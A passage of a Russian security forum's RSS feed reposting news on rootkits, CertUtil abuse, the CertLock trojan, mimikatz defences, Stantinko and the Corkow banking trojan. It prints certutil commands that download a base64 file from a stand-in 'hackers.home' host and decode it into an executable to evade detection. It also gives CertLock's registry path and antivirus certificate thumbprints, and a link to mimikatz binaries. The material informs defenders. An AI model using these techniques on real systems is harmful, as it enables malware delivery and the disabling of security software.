Киберпреступники используют руткиты для использования незащищенных сетей и перехвата личной информации пользователя и сообщений, таких как электронные письма и сообщения, которыми обмениваются в чате.<br /><br />
Дистанционное управление<br /><br />
Хакеры используют руткиты для удаленного доступа и изменения конфигурации системы. Затем хакеры могут изменить открытые порты TCP внутри брандмауэров или изменить сценарии запуска системы.<br /><br />
Типы руткит-атак<br /><br />
Злоумышленники могут устанавливать разные типы руткитов в любой системе. Ниже вы найдете обзор наиболее распространенных атак руткитов.<br /><br />
Руткиты приложений<br /><br />
Руткиты приложений заменяют законные файлы зараженными руткит-файлами на вашем компьютере. Эти руткиты заражают стандартные программы, такие как Microsoft Office, Notepad или Paint. Злоумышленники могут получить доступ к вашему компьютеру при каждом запуске этих программ. Антивирусные программы могут легко обнаружить их, так как они работают на прикладном уровне.<br /><br />
Руткиты ядра<br /><br />
Злоумышленники используют эти руткиты для изменения функциональности операционной системы, вставляя в нее вредоносный код. Это дает им возможность легко красть личную информацию.<br /><br />
Руткиты загрузчика<br /><br />
Механизм загрузчика отвечает за загрузку операционной системы на компьютер. Эти руткиты заменяют оригинальный загрузчик зараженным. Это означает, что руткиты загрузчика активны даже до полной загрузки операционной системы.<br /><br />
Аппаратные и прошивки руткитов<br /><br />
Этот вид руткита может получить доступ к системе BIOS компьютера или жестким дискам, а также к маршрутизаторам, микросхемам памяти и сетевым картам.<br /><br />
Виртуализированные руткиты<br /><br />
Виртуализированные руткиты используют преимущества виртуальных машин для управления операционными системами. Они были разработаны исследователями безопасности в 2006 году как доказательство концепции.<br /><br />
Эти руткиты создают виртуальную машину до загрузки операционной системы, а затем берут на себя управление вашим компьютером. Виртуализированные руткиты работают на более высоком уровне, чем операционные системы, что делает их практически незаметными.<br /><br /><b>Как предотвратить атаку руткита</b><br /><br />
Атаки руткитов опасны и вредны, но они могут заразить ваш компьютер, только если вы каким-то образом запустили вредоносное программное обеспечение, которое содержит руткит. В приведенных ниже советах изложены основные действия, которые необходимо выполнить, чтобы предотвратить заражение руткитами.<br /><br />
Сканирование ваших систем<br /><br />
Сканеры - это программы, предназначенные для анализа системы, чтобы избавиться от активных руткитов.<br /><br />
Сканеры руткитов обычно эффективны при обнаружении и удалении руткитов приложений. Однако они неэффективны против атак на ядро, загрузчик или прошивку. Сканеры уровня ядра могут обнаруживать вредоносный код, только когда руткит неактивен. Это означает, что вам необходимо остановить все системные процессы и загрузить компьютер в безопасном режиме, чтобы эффективно сканировать систему.<br /><br />
Эксперты по безопасности утверждают, что из-за этих ограничений один сканер не может гарантировать полную безопасность системы. Поэтому многие советуют использовать несколько различных сканеров. Чтобы полностью защитить себя от атак руткитов на уровне загрузки или прошивки, вам необходимо сделать резервную копию ваших данных, а затем переустановить всю систему.<br /><br />
Избегайте попыток фишинга<br /><br />
Фишинг - это тип атаки социальной инженерии, при которой хакеры используют электронную почту, чтобы обмануть пользователей, добавляя вредоносную ссылку или загружая зараженное вложение.<br /><br />
Мошенническое электронное письмо может быть любым: от мошенников нигерийского принца с просьбой вернуть золото до поддельных сообщений от Facebook с просьбой обновить ваши учетные данные для входа. Зараженные вложения могут быть документами Excel или Word, обычной исполняемой программой или зараженным изображением.<br /><br />
Обновите ваше программное обеспечение<br /><br />
Многие программы содержат уязвимости и ошибки, которые позволяют киберпреступникам использовать их, особенно устаревшее программное обеспечение. Обычно компании выпускают регулярные обновления для исправления этих ошибок и уязвимостей. Но не все уязвимости бывают обнародованы.<br /><br />
Постоянные обновления программного обеспечения необходимы для обеспечения безопасности и предотвращения заражения хакеров вредоносными программами. Поддерживайте актуальность всех программ и вашей операционной системы, и вы сможете избежать руткит-атак, использующих уязвимости.<br /><br />
Используйте антивирус следующего поколения<br /><br />
Авторы вредоносных программ всегда стараются быть на шаг впереди индустрии кибербезопасности. Чтобы противостоять их прогрессу, вы должны использовать антивирусные программы, которые используют современные методы безопасности, такие как обнаружение аномалий на основе машинного обучения и поведенческая эвристика. Этот тип антивируса может определять происхождение руткита на основе его поведения, обнаруживать вредоносное ПО и блокировать его заражение вашей системы.<br /><br />
Мониторинг сетевого трафика<br /><br />
Методы мониторинга сетевого трафика анализируют сетевые пакеты с целью выявления потенциально вредоносного сетевого трафика. Сетевая аналитика также может быстрее устранять угрозы, изолируя атакуемые сегменты сети, чтобы предотвратить распространение атаки.<br /><br /><a href="https://blog.malwarebytes.com/how-tos-2/2020/01/how-to-prevent-a-rootkit-attack/" rel="nofollow">https://blog.malwarebytes.com/how-tos-2/2020/01/how-to-prevent-a-rootkit-attack/</a>]]>
        </description>
    </item>
    <item>
        <title>CertUtil.exe позволяет злоумышленникам загружать вредоносное ПО с обходом AV</title>
        <link>https://chklst.ru/discussion/1619/certutil-exe-pozvolyaet-zloumyshlennikam-zagruzhat-vredonosnoe-po-s-obhodom-av</link>
        <pubDate>Fri, 06 Apr 2018 05:59:34 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1619@/discussions</guid>
        <description><![CDATA[
<blockquote>

<div>Windows has a built-in program called CertUtil, which can  be used to manage certificates in Windows. Using this program you can install, backup, delete, manage, and perform various functions related to certificates and certificate stores in Windows.<br /><br />
One of the features of CertUtil is the ability to download a certificate, or any other file for that matter, from a remote URL and save it as a local file using the syntax "certutil.exe -urlcache -split -f [хттп] output.file".</div>
</blockquote>

<hr />
Windows имеет встроенную программу CertUtil, которая может использоваться для управления сертификатами в Windows. С помощью этой программы вы можете устанавливать, резервировать, удалять, управлять и выполнять различные функции, связанные с сертификатами и хранилищами сертификатов в Windows.<br /><br />
Одной из особенностей CertUtil является возможность загрузить сертификат или любой другой файл по удаленному URL-адресу и сохранить его в виде локального файла, используя синтаксис «certutil.exe -urlcache -split -f [хттп] output .файл".<br /><blockquote>

<div>Security researcher Casey Smith tweeted in 2017 his concerns that this method could be used to download malware.</div>
</blockquote>
<br />
Исследователь по безопасности Кейси Смит в твиттере, еще в 2017 году, выразил обеспокоенность тем, что этот метод можно использовать для загрузки вредоносного ПО.<br /><br /><div data-tweeturl="https://twitter.com/subTee/status/888125678872399873" data-tweetid="888125678872399873"><a href="https://twitter.com/subTee/status/888125678872399873" rel="nofollow">https://twitter.com/subTee/status/888125678872399873</a></div><br /><blockquote>

<div>Smith's concerns were warranted as attackers have been utilizing CertUtil to download malware for quite a while. This sample utilized it in 2016 and a recent Trojan from March 2018 also utilizes it to download various batch files and scripts to an infected computer.</div>
</blockquote>
<br />
Опасения Смита были оправданы, поскольку злоумышленники использовали CertUtil для загрузки вредоносных программ довольно долгое время. Этот образец использовал его в 2016 году, а недавний троян с марта 2018 года также использует его для загрузки различных пакетных файлов и сценариев на зараженный компьютер.<br /><br /><img src="https://www.bleepstatic.com/images/news/security/c/certutil-malware-distribution/certutil-malware-behavior.jpg" alt="certutil-malware-behavior.jpg" /><br /><blockquote>

<div>You may be wondering why attackers would use CertUtil when they already have a foothold on a computer?  This is because some computers may be locked down so that unknown applications are unable to download programs.  By using a built-in Windows program, there is a possibility that CertUtil would be whitelisted by installed security programs and thus be allowed to download files.<br /><br />
This utilization of legitimate Windows programs to download and execute malware is not as it the Windows regsvr32.exe executable can be used in a similar manner.</div>
</blockquote>
<br />
Вам может быть интересно, почему злоумышленники будут использовать CertUtil, если у них уже есть плацдарм на компьютере? Это связано с тем, что некоторые компьютеры могут быть заблокированы, так что неизвестные приложения не могут загружать программы. Используя встроенную программу Windows, есть вероятность, что CertUtil будет включен в белый список установленных программ безопасности и, следовательно, будет разрешено загружать файлы.<br /><br />
Это использование законных программ для Windows для загрузки и выполнения вредоносных программ не так, как можно использовать аналогичный образ Windows regsvr32.exe.<br /><blockquote>

<div>Using CertUtil+Base64 to Bypass Security Software<br /><br />
Today security consultant and ISC Handler Xavier Mertens published a handler diary that adds a twist to the use of CertUtil that may make it easier for attacker's downloads to remain undetected by edge security devices. This is to first base64 encode the malicious file so it appears as harmless text and then decode it after it has been downloaded using CertUtil.exe.<br /><br />
As already discussed, you can download a file using CertUtil.exe by using the following command:<br /></div>
</blockquote>
Использование CertUtil + Base64 для обхода программного обеспечения безопасности<br /><br />
Сегодня консультант по вопросам безопасности и обработчик ISC Ксавье Мертенс опубликовали дневник обработчиков, который добавляет поворот к использованию CertUtil, который может упростить загрузку злоумышленников, оставаясь незамеченными пограничными устройствами безопасности. Это для первого base64 кодировать вредоносный файл, чтобы он выглядел как безобидный текст, а затем декодировал его после того, как он был загружен с помощью CertUtil.exe.<br /><br />
Как уже обсуждалось, вы можете загрузить файл с помощью CertUtil.exe, используя следующую команду:
<pre spellcheck="false" tabindex="0">certutil.exe -urlcache -split -f [хттп] output.file
</pre>

<blockquote>

<div>This will download the file in its original form and save it to the computer. The problem with this method is that network security devices can detect the file as malicious and block it.<br /><br />
To get past this, Mertens came up with the idea of first base64 encoding the malicious file so that to an edge device it just appears as harmless text. Then once the text file is downloaded, the "certutil.exe -decode"  command can be used to decode the base64 encoded file into the executable.<br /><br />
This is illustrated in Mertens' handler diary.</div>
</blockquote>
<br />
Это загрузит файл в оригинальной форме и сохранит его на компьютере. Проблема с этим методом заключается в том, что сетевые устройства безопасности могут обнаружить файл как вредоносный и заблокировать его.<br /><br />
Чтобы преодолеть это, Mertens придумал идею первого кода base64, кодирующего вредоносный файл, так что к пограничному устройству он просто выглядит как безобидный текст. После загрузки текстового файла команда «certutil.exe -decode» может использоваться для декодирования файла с кодировкой base64 в исполняемом файле.<br /><br />
Это проиллюстрировано в дневнике обработчика Мертенса.<br /><pre spellcheck="false" tabindex="0">C:\Temp&gt;certutil.exe -urlcache -split -f "хттпс://hackers.home/badcontent.txt" bad.txt&#13;
C:\Temp&gt;certutil.exe -decode bad.txt bad.exe
</pre>

<blockquote>

<div>This method potentially gets it past an edge device without being detected and then be converted back into the executable on the local machine where it may not be as secure.<br /><br />
While, I had not known of this actually being used in the wild, MalwareHunterTeam told me that the use of certutil.exe -decode is already being used. Examples can be seen in these samples. In addition, post-publication, we also discovered this write-up from F5 Labs detailing a campaign using CertUtil.exe to install coinminers on Windows.</div>
</blockquote>
Этот метод потенциально может пройти мимо пограничного устройства, не будучи обнаруженным, а затем преобразован обратно в исполняемый файл на локальном компьютере, где он может быть не таким безопасным.<br /><br />
MalwareHunterTeam пишет, что выражение <b>certutil.exe -decode</b> уже используется. Примеры использования есть в <a href="https://www.hybrid-analysis.com/sample/3bdecb8b3aaad6822a15011e5c9f10663c3ead64a61350148518b32f176ba02c?environmentId=100" rel="nofollow"><b>этих образцах</b></a>. Кроме того, после публикации мы также обнаружили <a href="https://f5.com/labs/articles/threat-intelligence/malware/old-dog-new-targets-switching-to-windows-to-mine-electroneum" rel="nofollow"><b>запись</b></a> из F5 Labs, в которой подробно описывается кампания с использованием CertUtil.exe для установки coinminers в Windows.<br /><br /><a href="https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/" rel="nofollow">https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/</a><br /><br /><a href="https://xakep.ru/2018/04/05/certutil-for-malware/" rel="nofollow">https://xakep.ru/2018/04/05/certutil-for-malware/</a>]]>
        </description>
    </item>
    <item>
        <title>CertLock Trojan блокирует программы безопасности  путем отказа в системе от их сертификатов</title>
        <link>https://chklst.ru/discussion/1612/certlock-trojan-blokiruet-programmy-bezopasnosti-putem-otkaza-v-sisteme-ot-ih-sertifikatov</link>
        <pubDate>Fri, 22 Dec 2017 04:22:34 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1612@/discussions</guid>
        <description><![CDATA[Новая тенденция у поставщиков рекламных и нежелательных программ заключается в установке "защитного" ПО, которое затрудняет пользователям Windows запуск своих программ безопасности. Это было видно с руткитом SmartService, который заблокировал работу AV программного обеспечения и теперь с программой "защиты", называемой <b>CertLock</b>.<br /><br />
С конца мая помощники форума безопасности заметили сообщения о том, что люди не могут устанавливать и запускать программы безопасности на своих зараженных компьютерах. Когда они пытаются запустить программы, их приветствуют предупреждением, в котором говорится, что данный издатель ПО был заблокирован от запуска на компьютере.<br /><br />
Оказывается, это вызвано тем, что CertLock не разрешает сертификат поставщика безопасности на зараженном компьютере, чтобы Windows не позволяла программе работать.<br /><br />
CertLock запрещает сертификаты поставщика безопасности<br /><br />
Обычно он обнаруживается антивирусными поставщиками как Ceram или Wdfload, CertLock распространяется с пакетами нежелательных программ, таких как майнеры. После установки CertLock будет блокировать сертификат поставщика безопасности, добавив их в специальный раздел реестра Windows. Это приводит к тому, что Windows не выполняет никаких программ, подписанных с этим сертификатом.<br /><br />
CertLock блокирует сертификат, создавая дочерний ключ с именем отпечатка сертификата, который он хочет заблокировать, в  следующем ключе:
<pre spellcheck="false" tabindex="0">HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\
</pre>
<br />
Например, один из сертификатов ESET имеет отпечаток F83099622B4A9F72CB5081F742164AD1B8D048C9. Чтобы заблокировать этот сертификат, CertLock создаст ключ реестра:
<pre spellcheck="false" tabindex="0">HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9
</pre>
<br />
Под этим ключом будет одно значение BLOB, содержащее информацию о сертификате. Вы можете увидеть пример раздела реестра, используемого для блокировки сертификата ESET ниже.<br /><br /><img src="https://chklst.ru/uploads/editor/ej/8a9lslty411g.jpg" alt="8a9lslty411g.jpg" /><br /><br />
Если сертификат добавлен Disallowed list, когда пользователь пытается запустить программу, подписанную этим сертификатом, они будут встречены с ошибкой, которая гласит: «Издатель был заблокирован от запуска программного обеспечения на вашем компьютере».<br /><br />
В то время как блокирующий сертификат запрещает запуск подписных установщиков, он также предотвращает выполнение уже установленных программ, которые также используют заблокированный сертификат. Например, когда сертификаты подписи кода Malwarebytes блокированы, пользователи получают ошибки при попытке запустить программу. Эти ошибки указывают:<br /><blockquote>

<div>Unable to start<br />
Unable to connect the Service.</div>
</blockquote>
или:
<blockquote>

<div>Error<br />
Runtime Error (at 49:120):<br />
Could not call proc.</div>
</blockquote>
<br />
Этот троян явно не любит Avast<br /><br />
Хотя CertLock уже запрещает использование сертификата AVAST, он также делает шаг вперед, чтобы убедиться, что Avast не может работать. Он делает это, указывая многие имена хостов Avast.com на 127.0.0.1, используя файл Windows HOSTs, чтобы компьютер не мог подключиться к ним.<br /><br />
CertLock генерирует список хостов Avast для блокировки, загружая файл files.avast.com/iavs9x/servers.def. Этот файл содержит список имен хостов, связанных с программой безопасности Avast. Затем он анализирует этот файл и добавляет его в файл Windows HOSTS.<br /><br />
Добавляя имена хостов в файл HOSTS и указывая их на 127.0.0.1, он фактически блокирует доступ компьютера к этим серверам.<br /><br />
Как удалить сертификаты, запрещенные CertLock<br /><br />
Софт-менеджер ToolsLib.com и Malwarebytes Разработчик AdwCleaner Jérôme.B создал инструмент <a href="https://toolslib.net/downloads/viewdownload/385-avcertclean/" rel="nofollow"><b>AVCertClean</b></a>, который сканирует раздел Disallowed registry key для заблокированных ключей и удаляет их. Чтобы использовать инструмент, просто загрузите и выполните его. Затем программа автоматически удалит заблокированные сертификаты.<br /><br />
По завершении программы он отобразит журнал, в котором перечислены сертификаты, очищенные с помощью AVCertClean.<br /><br />
Теперь, когда сертификаты больше не блокируются, пользователи могут устанавливать и запускать свои программы безопасности для очистки своего компьютера. В некоторых ситуациях пользователю может потребоваться перезапустить приложение, чтобы запустить их.<br /><br />
Например, для запуска Malwarebytes после очистки сертификатов пользователи должны зайти в диспетчер служб Windows (services.msc) и перезапустить службу Malwarebytes.<br /><blockquote>

<div>Disallowed Certificates (Thumbprints):<br />
Security Vendor 	Thumbprint<br />
AVAST: 	AD4C5429E10F4FF6C01840C20ABA344D7401209F<br />
AVAST: 	DB77E5CFEC34459146748B667C97B185619251BA<br />
AVG: 	3D496FA682E65FC122351EC29B55AB94F3BB03FC<br />
AVG: 	AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947<br />
AVG Technologies: 	E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF<br />
Adaware: 	9132E8B079D080E01D52631690BE18EBC2347C1E<br />
Avira: 	A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99<br />
BitDefender: 	18DEA4EFA93B06AE997D234411F3FD72A677EECE<br />
BitDefender: 	ED841A61C0F76025598421BC1B00E24189E68D54<br />
BullGuard: 	A5341949ABE1407DD7BF7DFE75460D9608FBC309<br />
Bullguard: 	76A9295EF4343E12DFC5FE05DC57227C1AB00D29<br />
Checkpoint Software: 	5240AB5B05D11B37900AC7712A3C6AE42F377C8C<br />
Comodo: 	03D22C9C66915D58C88912B64C1F984B8344EF09<br />
Comodo: 	872CD334B7E7B3C3D1C6114CD6B221026D505EAB<br />
CurioLab: 	9E3F95577B37C74CA2F70C1E1859E798B7FC6B13<br />
Doctor Web: 	4420C99742DF11DD0795BC15B7B0ABF090DC84DF<br />
Doctor Web: 	FFFA650F2CB2ABC0D80527B524DD3F9FC172C138<br />
ESET: 	A59CC32724DD07A6FC33F7806945481A2D13CA2F<br />
ESET: 	F83099622B4A9F72CB5081F742164AD1B8D048C9<br />
Emsisoft: 	4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF<br />
Emsisoft: 	5DD3D41810F28B2A13E9A004E6412061E28FA48D<br />
F-Secure: 	0F684EC1163281085C6AF20528878103ACEFCAAB<br />
FRISK: 	1667908C9E22EFBD0590E088715CC74BE4C60884<br />
GData: 	2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF<br />
K7 Computing: 	42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01<br />
K7 Computing: 	7457A3793086DBB58B3858D6476889E3311E550E<br />
Kaspersky: 	3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F<br />
Kaspersky: 	D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598<br />
Malwarebytes: 	249BDA38A611CD746A132FA2AF995A2D3C941264<br />
Malwarebytes: 	B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84<br />
McAfee: 	775B373B33B9D15B58BC02B184704332B97C3CAF<br />
McAfee: 	88AD5DFE24126872B33175D1778687B642323ACF<br />
PC Tools: 	4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159<br />
Panda: 	FBB42F089AF2D570F2BF6F493D107A3255A9BB1A<br />
SUPERAntiSpyware: 	373C33726722D3A5D1EDD1F1585D5D25B39BEA1A<br />
Safer Networking: 	982D98951CF3C0CA2A02814D474A976CBFF6BDB1<br />
Symantec: 	31AC96A6C17C425222C46D55C3CCA6BA12E54DAF<br />
Symantec: 	AD96BB64BA36379D2E354660780C2067B81DA2E0<br />
ThreatTrack Security: 	9C43F665E690AB4D486D4717B456C5554D4BCEB5<br />
ThreatTrack Security: 	DB303C9B61282DE525DC754A535CA2D6A9BD3D87<br />
Total Defense: 	E22240E837B52E691C71DF248F12D27F96441C00<br />
Trend Micro: 	331E2046A1CCA7BFEF766724394BE6112B4CA3F7<br />
Trend Micro: 	CDC37C22FE9272D8F2610206AD397A45040326B8<br />
Webroot: 	3353EA609334A9F23A701B9159E30CB6C22D4C59<br />
Webroot: 	9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361</div>
</blockquote>
<br /><a href="https://www.bleepingcomputer.com/news/security/certlock-trojan-blocks-security-programs-by-disallowing-their-certificates/" rel="nofollow">https://www.bleepingcomputer.com/news/security/certlock-trojan-blocks-security-programs-by-disallowing-their-certificates/</a><br /><br /><a href="https://www.virustotal.com/en/file/b529ca4dd148fdfcee0c1f267bc6821cc5168c121363fa690536a72e0f447c19/analysis/1500276443/" rel="nofollow">https://www.virustotal.com/en/file/b529ca4dd148fdfcee0c1f267bc6821cc5168c121363fa690536a72e0f447c19/analysis/1500276443/</a><br /><br /><img src="https://chklst.ru/uploads/editor/fd/q01hnevhjwut.jpg" alt="q01hnevhjwut.jpg" /><br /><br /><a href="https://www.joesecurity.org/reports/report-679a54233089bd649b01bc70905e22cd.html" rel="nofollow">https://www.joesecurity.org/reports/report-679a54233089bd649b01bc70905e22cd.html</a><br />]]>
        </description>
    </item>
    <item>
        <title>Методы защиты от mimikatz в домене Windows</title>
        <link>https://chklst.ru/discussion/1607/metody-zaschity-ot-mimikatz-v-domene-windows</link>
        <pubDate>Tue, 31 Oct 2017 03:32:10 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1607@/discussions</guid>
        <description><![CDATA[Опасный инструмент. Все чаще его используют для того что распространить шифраторы в локальной сети.<br /><blockquote>

<div>Не так давно мы делали комплексный материал о том, как можно сдампить пользовательские пароли из Windows-системы. Утилита Windows Credentials Editor – одно из наиболее известных и универсальных решений. Однако недавно французские исследователи выпустили совершенно убойную наработку mimikatz. Помимо уже известных приемов, она умеет… извлекать пароли пользователей в открытом виде. Правда, только тех, которые осуществили вход в системе. Сначала мы подумали, что это фэйк и подстава, но первый же запуск утилиты подтвердил — все работает. Прога предоставляет свою собственную консоль, из которой можно запустить необходимые модули для различных ситуаций (концепция «швейцарского ножа»).</div>
</blockquote>
<br /><a href="https://xakep.ru/2012/11/22/extract-passwords-from-windows-memory/" rel="nofollow">https://xakep.ru/2012/11/22/extract-passwords-from-windows-memory/</a><br /><br /><blockquote>

<div>Конец июня 2017 года запомнился IT сообществу по массовому заражению множества крупнейших компаний и госучреждений России, Украины и других стран новым вирусом-шифровальщиком Petya (NotPetya). В большинстве случаев, после проникновения внутрь корпоративной сети, Petya молниеносно распространялся по всем компьютерам и серверам домена, парализуя до 70-100% всей Windows-инфраструктуры. И хотя, одним из методов распространения Пети между компьютерами сети было использование эксплоита EternalBlue (как и в случае с WannaCry), это был не основной канал распространения вымогателя. В отличии от WCry, который распространялся исключительно благодаря уязвимости в SMBv1, NotPetya были изначально заточен под корпоративные сети. После заражения системы, шифровальщик с помощью общедоступной утилиты Mimikatz, получал учетные данные (пароли, хэши) пользователей компьютера и использовал их для дальнейшего распространения по сети с помощью WMI и PsExec, вплоть до полного контроля над доменом. Соответственно, для защиты всех систем не достаточно было установить обновление MS17-010.<br /><br />
В этой статье мы рассмотрим основные методики защиты Windows систем в домене Active Directory от атак посредством Mimikatz–like инструментов.<br /><br />
Утилита Mimikatz с помощью модуля sekurlsa позволяет извлечь пароли и хэши авторизованных пользователей, хранящиеся в памяти системного процесса LSASS.EXE (Local Security Subsystem Service ). У нас уже была статья с примером использования mimikatz  для получения в паролей пользователей в открытом виде (из WDigest,  LiveSSP и SSP).<br /></div>
</blockquote>
<br /><a href="http://winitpro.ru/index.php/2017/08/24/metody-zashhity-ot-mimikatz-v-domene-windows/" rel="nofollow">http://winitpro.ru/index.php/2017/08/24/metody-zashhity-ot-mimikatz-v-domene-windows/</a><br /><br />
блог создателя утилиты<br /><a href="http://blog.gentilkiwi.com/mimikatz" rel="nofollow">http://blog.gentilkiwi.com/mimikatz</a><br /><br /><img src="https://chklst.ru/uploads/editor/so/rn11ck9u0r1j.jpg" alt="rn11ck9u0r1j.jpg" /><br /><br /><br />
скачать бинарники можно отсюда:<br /><a href="https://github.com/gentilkiwi/mimikatz/releases/latest" rel="nofollow">https://github.com/gentilkiwi/mimikatz/releases/latest</a><br />]]>
        </description>
    </item>
    <item>
        <title>Stantinko</title>
        <link>https://chklst.ru/discussion/1598/stantinko</link>
        <pubDate>Tue, 25 Jul 2017 06:08:13 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1598@/discussions</guid>
        <description><![CDATA[<img src="https://www.esetnod32.ru/local/templates/esetnod32v2/images/logo-eset.png" alt="logo-eset.png" /><br /><blockquote>

<div>ESET, мировой лидер в области кибербезопасности, исследовал и выявил сложную угрозу, создаваемую новым штаммом вредоносных программ, который до сих пор затронул полмиллиона пользователей.<br /><br />
ESET анализирует это крайне незаметное вредоносное ПО, которое подталкивает жертв к загрузке пиратского программного обеспечения с поддельных торрент-сайтов, и оно постоянно менялось, чтобы избежать обнаружения в течение последних пяти лет. Ориентируясь в основном на русскоговорящих, Stantinko - это сеть ботов, которые монетизируются путем установки расширений браузера, которые вводят поддельные объявления во время серфинга в Интернете. После установки на машине он может выполнять массовые поисковые запросы Google анонимно и создавать поддельные учетные записи на Facebook с возможностью просмотра изображений, страниц и добавления друзей.</div>
</blockquote>
<br /><img src="https://chklst.ru/uploads/editor/zj/xiabniabv047.jpg" alt="xiabniabv047.jpg" /><br /><br /><a href="https://www.eset.com/int/about/newsroom/research/eset-waves-red-flag-insight-into-hidden-malware-affecting-500000-users/" rel="nofollow">https://www.eset.com/int/about/newsroom/research/eset-waves-red-flag-insight-into-hidden-malware-affecting-500000-users/</a><br /><br /><a href="https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" rel="nofollow">https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/</a><br /><br />
детальный отчет здесь:<br /><a href="http://welivesecurity.com/wp-content/uploads/2017/07/Stantinko.pdf" rel="nofollow">http://welivesecurity.com/wp-content/uploads/2017/07/Stantinko.pdf</a>]]>
        </description>
    </item>
    <item>
        <title>Corkow</title>
        <link>https://chklst.ru/discussion/531/corkow</link>
        <pubDate>Mon, 11 Aug 2014 11:02:51 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">531@/discussions</guid>
        <description><![CDATA[Как и в случае с другими банковскими троянскими программами, например, Win32/Spy.Hesperbot, <b>Win32/Corkow </b>состоит из основного модуля и нескольких плагинов, которые реализуют соответствующие возможности. Каждый такой плагин или модуль выполнен в виде DLL-библиотеки. На самом деле большинство других плагинов внедрены в основную DLL, другие же загружаются с управляющего C&amp;C-сервера. В любом случае, эта основная DLL будет инжектировать другие модули в процессы, работающие в системе. Ниже в таблице представлены различные модули, которые мы видели во всех проанализированных образцах Win32/Corkow. Обратите внимание, что не все семплы вредоносной программы содержат каждый из этих модулей.

<img src="http://habrastorage.org/getpro/habr/post_images/479/d86/ae3/479d86ae36b7215291fa7df1c0b6aefe.png" alt="image" />

Несмотря на то, что основной модуль «Core DLL» отвечает за запуск других модулей на исполнение и загрузку конфигурационных данных с C&amp;C, каждый из таких модулей содержит свой список C&amp;C-серверов для загрузки туда данных напрямую.

Как можно увидеть в таблице выше, вредоносный код Win32/Corkow содержит возможности, которые являются типичными для банковских троянских программ, в том числе, кейлоггер, модуль снятия скриншотов и граббер данных веб-форм для кражи аутентификационных данных онлайн-банкинга. Тем не менее три последних модуля реализуют функции, которые можно не часто встретить в банковских троянских программах. Win32/Corkow использует два отдельных модуля для компрометации приложения ДБО iBank2 и приложения Сбербанка, которое используется для доступа к своему счету корпоративными пользователями. Последний модуль DC используется для поиска индикаторов активности пользователя по отношению к следующим типам информации:

    приложениям трейдинговых платформ;
    сайтов трейдинговых платформ (история браузера);
    отдельных банковских приложений;
    банковских сайтов (история браузера);
    сайтов Bitcoin;
    средства разработки приложений Android.


<b>Инсталляция</b>

Win32/Corkow имеет интересную и относительно сложную процедуру установки. Троян обычно поставляется жертве в виде исполняемого файла дроппера, который содержит основную Core DLL в секции ресурсов. 

<img src="http://habrastorage.org/getpro/habr/post_images/0cf/771/211/0cf771211d808fd4130ee28631f2057e.png" alt="image" />

Рис. Установка дроппера в систему.

Когда дроппер запускается на исполнение, он устанавливает себя в систему используя следующие шаги:

    Расшифровывает находящуюся в секции ресурсов основную DLL и исполняет ее через вызов функции DllMain, передавая ей один из путей в качестве аргумента. Этот путь определяет каким образом и в какое расположение на томе троян должен быть установлен. Выбранный путь зависит от того, под какой учетной записью был запущен дроппер, обычного пользователя или администратора. Возможные пути установки указаны в таблице ниже.

    Когда код основной DLL запущен на исполнение, он выполняет поиск системного файла для заражения. Для этого Corkow ищет по определенному критерию легитимную DLL-библиотеку из директории %SystemRoot%\System32. Критерий поиска включает в себя незащищенность (SfcIsFileProtected) искомой библиотеки и некоторые конкретные имена файлов, а также отсутствие определенных импортов у DLL.

    Далее вредоносный код заражает выбранную DLL путем шифрования своего тела и записывая эти зашифрованные данные в секцию ресурсов выбранной DLL. Функция (заглушка) расшифровки тела также записывается в файл и ее адрес добавляется в таблицу экспортов. Имя этого экспорта также зависит от пути установки.

    Зараженная DLL сохраняется по выбранному пути установки. Заметьте, что оригинальная DLL в директории system32 остается неизменной.

    Вредоносный код устанавливает соответствующий раздел реестра для обеспечения выживаемости кода после перезагрузки. Раздел реестра также зависит от пути установки, которые перечислены ниже в таблице.

<img src="http://habrastorage.org/getpro/habr/post_images/990/91d/53b/99091d53beee3d05d29051371a6f9148.png" alt="image" />

Возможные пути установки вредоносного кода.

Существует множество способов загрузки DLL библиотеки в ОС и Win32/Corkow может использовать один из трех способов, описанных выше. Каждый из этих способов загружает DLL через вызов экспорта с разными именами. Все эти имена принадлежат функции, которая расшифровывает основное тело вредоносного кода из секции ресурсов.

Как мы указали выше, основная DLL Corkow записывается в секцию ресурсов оригинальной системной DLL в зашифрованном виде, кроме этого к ней применяется сжатие aPLib. Для шифрования используется XOR с ключом, который формируется из данных Volume Serial Number диска C: с использованием алгоритма multiply-with-carry. После установки зараженная Corkow библиотека привязывается к зараженному компьютеру и не может быть запущена на другом компьютере. Таким образом вредоносный код защищает себя от анализа со стороны вирусных аналитиков.

Core DLL и работа с C&amp;C

